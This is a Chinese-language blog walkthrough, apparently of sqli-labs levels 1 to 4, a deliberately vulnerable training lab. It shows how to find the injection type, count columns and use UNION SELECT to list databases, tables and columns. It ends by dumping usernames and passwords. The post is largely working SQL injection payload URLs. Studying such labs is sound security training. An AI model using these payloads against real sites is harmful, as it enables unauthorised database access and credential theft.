sqli-labs闯关笔记

sqli-labs闯关笔记


第一关

1.经过语句and 1=2测试 ,页面回显正常,所以该地方不是数值查询
在这里插入图片描述

http://sqli-labs:84/Less-1/?id=1 and 1=2--+

%20是空格

2.在id后面加上’,发现页面回显不正常,表示可能存在SQL字符注入
在这里插入图片描述

http://sqli-labs:84/Less-1/?id=1'

%27是单引号

3.输入--+将sql后面的语句注释掉后,发现页面回显正常,证明这个地方是单引号字符型注入
在这里插入图片描述
--+是注释

4.接着使用order by 语句判断,该表中一共有几列数据
order by 1-3页面回显正常,order by 4页面回显不正常,说明此表一个有3列。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

http://sqli-labs:84/Less-1/?id=1' order by 4--+

5.将id=1改为一个数据库不存在的id值,如857,使用union select 1,2,3联合查询语句查看页面是否有显示位。

(这个显示位指的是网页中能够显示数据的位置。
举例来说,比如我们通过ORDER BY命令知道了表的列数为11。然后再使用UNION SELECT 1,2,3…,11 from table,网页中显示了信息8,那么说明网页只能够显示第8列中信息,不能显示其他列的信息。也可以理解为网页只开放了8这个窗口,你想要查询数据库信息就必须要通过这个窗口。)

http://sqli-labs:84/Less-1/?id=857' union select 1,2,3--+

在这里插入图片描述
发现页面先输出了2和3,说明页面有2个显示位

6.然后利用sql查询语句依次爆破出数据库内的数据库名,表名,列名,字段信息

?id=857’ union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+

在这里插入图片描述
这是一个查询数据库名信息的语句
group_concat是能将相同的行组合起来的函数
在这里插入图片描述
在这里插入图片描述
查询库中有多少表:

?id=-1 'union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()--+`

在这里插入图片描述
在这里插入图片描述
查询敏感信息表的字段:

?id=-1'union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='users'--+

查询敏感字段内容:
在这里插入图片描述

?id=-1'union select 1,group_concat(username),group_concat(password) from security.users--+

第二关

无符号包裹的报错注入GET

输入?id=1’,报错回显如下
在这里插入图片描述
传入的是1’但是报错信息只有’ limit 0,1那么就是id就是无符号包裹

不用闭合直接注–+释掉后面的语句即可
方法和less-1一样
利用mysql自带的信息表查询库,表,字段的名称

查询数据库名,数据库用户名等信息:?id=857 union select 1,user(),database()--+

查询库中有多少表:?id=857 union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()--+

查询敏感信息表的字段:?id=857 union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='users'--+

查询敏感字段内容:?id=-1 union select 1,group_concat(username),group_concat(password) from security.users--+

            

在这里插入图片描述

第三关

?id=1'报错回显
在这里插入图片描述

?id=-1' ) union select 1,2,3--+

在这里插入图片描述

?id=-1') union select 1,version(),user() --+

在这里插入图片描述
省略一些步骤 其他和一二关一样 不多赘述了

在这里插入图片描述

?id=-1') union select 1,group_concat(username),group_concat(password) from security.users--+

第四关

?id=1' 页面没有报错 试试?id=1"
在这里插入图片描述
?id=1")--+闭合常规注入即可

?id=-1")union select 1,version(),database()--+

在这里插入图片描述

?id=-1") union select 1,group_concat(username),group_concat(password) from security.users--+

省略一些步骤 其他和一二关一样 不多赘述了

在这里插入图片描述

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值